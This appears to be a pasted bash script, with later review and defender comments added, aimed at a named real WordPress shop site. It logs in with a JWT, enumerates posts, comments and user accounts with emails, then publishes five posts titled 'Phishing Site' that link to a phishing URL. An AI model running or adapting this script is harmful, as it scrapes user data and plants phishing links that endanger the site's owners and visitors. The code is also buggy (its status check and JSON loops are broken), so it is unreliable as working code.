WhosYourDaddySec

Nkomo

Sep 26th, 2024
  1. #!/bin/bash
  2.  
  # Required external tools: jq (JSON parsing) and curl (HTTP requests).
  # Abort with a message on stderr and exit status 1 if either is missing.
  if ! command -v jq >/dev/null 2>&1; then
    echo >&2 "jq is required but it's not installed. Aborting."
    exit 1
  fi
  if ! command -v curl >/dev/null 2>&1; then
    echo >&2 "curl is required but it's not installed. Aborting."
    exit 1
  fi
  6.  
  7. # Constants
  8. ENDPOINT="https://www.shop2shop.co.za/wp-json/wp/v2/"
  9. AUTH_URL="https://www.shop2shop.co.za/wp-json/jwt-auth/v1/token"
  10. LOG_FILE="wp_api_tool.log"
  11.  
  # Append one timestamped entry to the log file.
  # Globals:   LOG_FILE (read) - path the entry is appended to
  # Arguments: $1 - text of the entry
  # Outputs:   nothing on stdout; one "YYYY-MM-DD HH:MM:SS - text" line in LOG_FILE
  log_message() {
    local entry="$1"
    local stamp
    stamp=$(date '+%Y-%m-%d %H:%M:%S')
    printf '%s - %s\n' "$stamp" "$entry" >> "$LOG_FILE"
  }
  17.  
  # Prompt on the terminal for a WordPress username and password.
  # Globals: USERNAME, PASSWORD (written as plain shell variables)
  get_credentials() {
    read -p "Enter your WordPress username: " USERNAME
    # -s turns off terminal echo while the password is typed.
    # NOTE(review): neither read uses -r, so a backslash in the input is
    # treated as an escape character instead of being kept literally.
    read -sp "Enter your WordPress password: " PASSWORD
    # The typed newline is not echoed under -s; print one to end the prompt line.
    echo
  }
  24.  
  # Send one JSON request carrying the bearer token and print the response body.
  # Globals:   TOKEN (read); RESPONSE, RESPONSE_CODE (written); LOG_FILE via log_message
  # Arguments: $1 - HTTP method, $2 - URL, $3 - request body (callers pass "" for GET)
  # Outputs:   response body on stdout when the status check passes
  fetch_json() {
    local method="$1"
    local url="$2"
    local data="$3"

    # The request is sent here, before any of the checks below run.
    # -s silences curl's progress and error output; no timeout option is passed.
    RESPONSE=$(curl -s -X "$method" "$url" -H 'Content-Type: application/json' -H "Authorization: Bearer $TOKEN" -d "$data")
    # $? here is curl's process exit status, not the HTTP status code.
    RESPONSE_CODE=$?

    # NOTE(review): curl's exit status is 0 on a completed transfer and is never
    # 200 or 201, so this condition is true on every call. Every caller in this
    # script invokes fetch_json inside $(...), so `exit 1` ends only that
    # subshell and the "Error:" line on stdout is captured by the caller rather
    # than shown. The request has already been sent by the time this runs.
    if [[ "$RESPONSE_CODE" -ne 200 && "$RESPONSE_CODE" -ne 201 ]]; then
      log_message "Error: Received status code $RESPONSE_CODE for URL $url"
      # The complete response body is appended to LOG_FILE in plain text.
      log_message "Response: $RESPONSE"
      echo "Error: Received status code $RESPONSE_CODE. Check the log for details."
      exit 1
    fi

    echo "$RESPONSE"
  }
  43.  
  # Exchange USERNAME/PASSWORD for a JWT at AUTH_URL and keep it in TOKEN.
  # Globals: AUTH_URL, USERNAME, PASSWORD (read); TOKEN_RESPONSE, TOKEN (written)
  # Exits the script with status 1 when the response has no .token field
  # (this function is called directly, not in a subshell).
  get_token() {
    # NOTE(review): the credentials are spliced into the JSON body without
    # escaping and passed on curl's command line, where they can show up in
    # process listings on the machine running the script.
    # Server side, each run appears as a POST to the jwt-auth/v1/token route.
    TOKEN_RESPONSE=$(curl -s -X POST "$AUTH_URL" -d "{\"username\":\"$USERNAME\", \"password\":\"$PASSWORD\"}" -H 'Content-Type: application/json')

    # `.token // empty` yields an empty string when the field is absent or null.
    TOKEN=$(echo "$TOKEN_RESPONSE" | jq -r '.token // empty')

    if [[ -z "$TOKEN" ]]; then
      log_message "Error: Failed to obtain token."
      # The whole token-endpoint response is written to LOG_FILE on failure.
      log_message "Response: $TOKEN_RESPONSE"
      echo "Error: Failed to obtain token. Check the log for details."
      exit 1
    fi

    log_message "Token obtained successfully."
  }
  59.  
  # Decode the first two dot-separated segments of a JWT and write them to the log.
  # Arguments: $1 - the token string
  # This only decodes; it performs no signature or expiry check.
  decode_jwt() {
    local jwt="$1"
    # NOTE(review): JWT segments are base64url and normally unpadded, while
    # `base64 --decode` expects the standard alphabet with padding. stderr is
    # discarded, so a failed or truncated decode is logged without any warning.
    # `local var=$(...)` also hides the pipeline's exit status.
    local header=$(echo "$jwt" | cut -d '.' -f1 | base64 --decode 2>/dev/null)
    local payload=$(echo "$jwt" | cut -d '.' -f2 | base64 --decode 2>/dev/null)

    # The decoded token claims end up in plain text in LOG_FILE.
    log_message "JWT Header: $header"
    log_message "JWT Payload: $payload"
  }
  69.  
  # Request the posts collection and print id, title and date for each entry,
  # then request the comments for that post.
  # Globals: ENDPOINT (read); POSTS, POST, POST_ID, POST_TITLE, POST_DATE (written)
  extract_posts() {
    # ENDPOINT already ends in "/", so this URL contains "v2//posts".
    POSTS=$(fetch_json GET "$ENDPOINT/posts" "")

    # NOTE(review): the unquoted $(...) is word-split on whitespace and
    # glob-expanded, so a compact JSON object containing a space (for example
    # inside a title) reaches the loop as several fragments, not one object.
    for POST in $(echo "$POSTS" | jq -c '.[]'); do
      POST_ID=$(echo "$POST" | jq -r '.id')
      POST_TITLE=$(echo "$POST" | jq -r '.title.rendered')
      POST_DATE=$(echo "$POST" | jq -r '.date')

      echo "Post ID: $POST_ID"
      echo "Title: $POST_TITLE"
      echo "Date: $POST_DATE"

      # One additional request per post; fetch_comments is defined below in the file.
      fetch_comments "$POST_ID"
    done
  }
  86.  
  # Request the comments for one post and print id, author name and content.
  # Arguments: $1 - post id, placed unmodified into the query string
  # Globals:   ENDPOINT (read); COMMENTS, COMMENT, COMMENT_ID, COMMENT_AUTHOR,
  #            COMMENT_CONTENT (written)
  fetch_comments() {
    local POST_ID=$1
    COMMENTS=$(fetch_json GET "$ENDPOINT/comments?post=$POST_ID" "")

    # NOTE(review): if COMMENTS is not valid JSON, jq prints nothing and the
    # numeric test compares an empty string with 0 — confirm how that behaves.
    if [[ "$(echo "$COMMENTS" | jq '. | length')" -eq 0 ]]; then
      echo "No comments found for Post ID: $POST_ID."
      return
    fi

    # Same unquoted-expansion caveat as the posts loop: comment bodies with
    # spaces are split into fragments before jq sees them.
    for COMMENT in $(echo "$COMMENTS" | jq -c '.[]'); do
      COMMENT_ID=$(echo "$COMMENT" | jq -r '.id')
      COMMENT_AUTHOR=$(echo "$COMMENT" | jq -r '.author_name')
      COMMENT_CONTENT=$(echo "$COMMENT" | jq -r '.content.rendered')

      echo "Comment ID: $COMMENT_ID"
      echo "Author: $COMMENT_AUTHOR"
      echo "Content: $COMMENT_CONTENT"
    done
  }
  107.  
  # Request the users collection and print id, display name and e-mail per entry.
  # Globals: ENDPOINT (read); USERS, USER, USER_ID, USER_NAME, USER_EMAIL (written)
  # Defender's view: requests to the users collection are an account-enumeration
  # signal worth alerting on; which fields the server returns depends on its
  # configuration and on the privileges of the token's account.
  extract_users() {
    USERS=$(fetch_json GET "$ENDPOINT/users" "")

    # NOTE(review): USER is also a standard environment variable name; this loop
    # overwrites it for the rest of the script.
    for USER in $(echo "$USERS" | jq -c '.[]'); do
      USER_ID=$(echo "$USER" | jq -r '.id')
      USER_NAME=$(echo "$USER" | jq -r '.name')
      # jq -r prints the literal string "null" when the field is absent.
      USER_EMAIL=$(echo "$USER" | jq -r '.email')

      echo "User ID: $USER_ID"
      echo "Name: $USER_NAME"
      echo "Email: $USER_EMAIL"
    done
  }
  122.  
  # Send five POST requests to the posts collection, each asking for a post
  # titled "Phishing Site <n>" whose body is a link to http://phishing-site.com.
  # The original header says "for testing", but nothing in the script limits
  # this to a test site: the target is the hard-coded ENDPOINT.
  # This is the only state-changing step in the script. "status": "publish"
  # requests immediate publication rather than a draft; whether it succeeds
  # depends on the role of the account behind TOKEN.
  # Defender's view: look for authenticated POSTs to the posts route and for
  # posts with these titles; limiting publish rights to the accounts that need
  # them bounds the impact of one stolen credential.
  create_phishing_posts() {
    for i in {1..5}; do
      POST_DATA=$(fetch_json POST "$ENDPOINT/posts" "{\"title\": \"Phishing Site $i\", \"content\": \"<a href='http://phishing-site.com'>Click Here</a>\", \"status\": \"publish\"}")
      # Prints whatever jq extracts as .id from the captured output.
      echo "Created Phishing Post ID: $(echo "$POST_DATA" | jq -r '.id')"
    done
  }
  130.  
  131. # Main execution starts here
  132. echo "Starting WordPress API automation tool..."
  133. log_message "Script execution started."
  134.  
  135. get_credentials
  136. get_token
  137. decode_jwt "$TOKEN"
  138.  
  139. extract_posts
  140. extract_users
  141. create_phishing_posts
  142.  
  143. echo "Script execution completed."
  144. log_message "Script execution completed."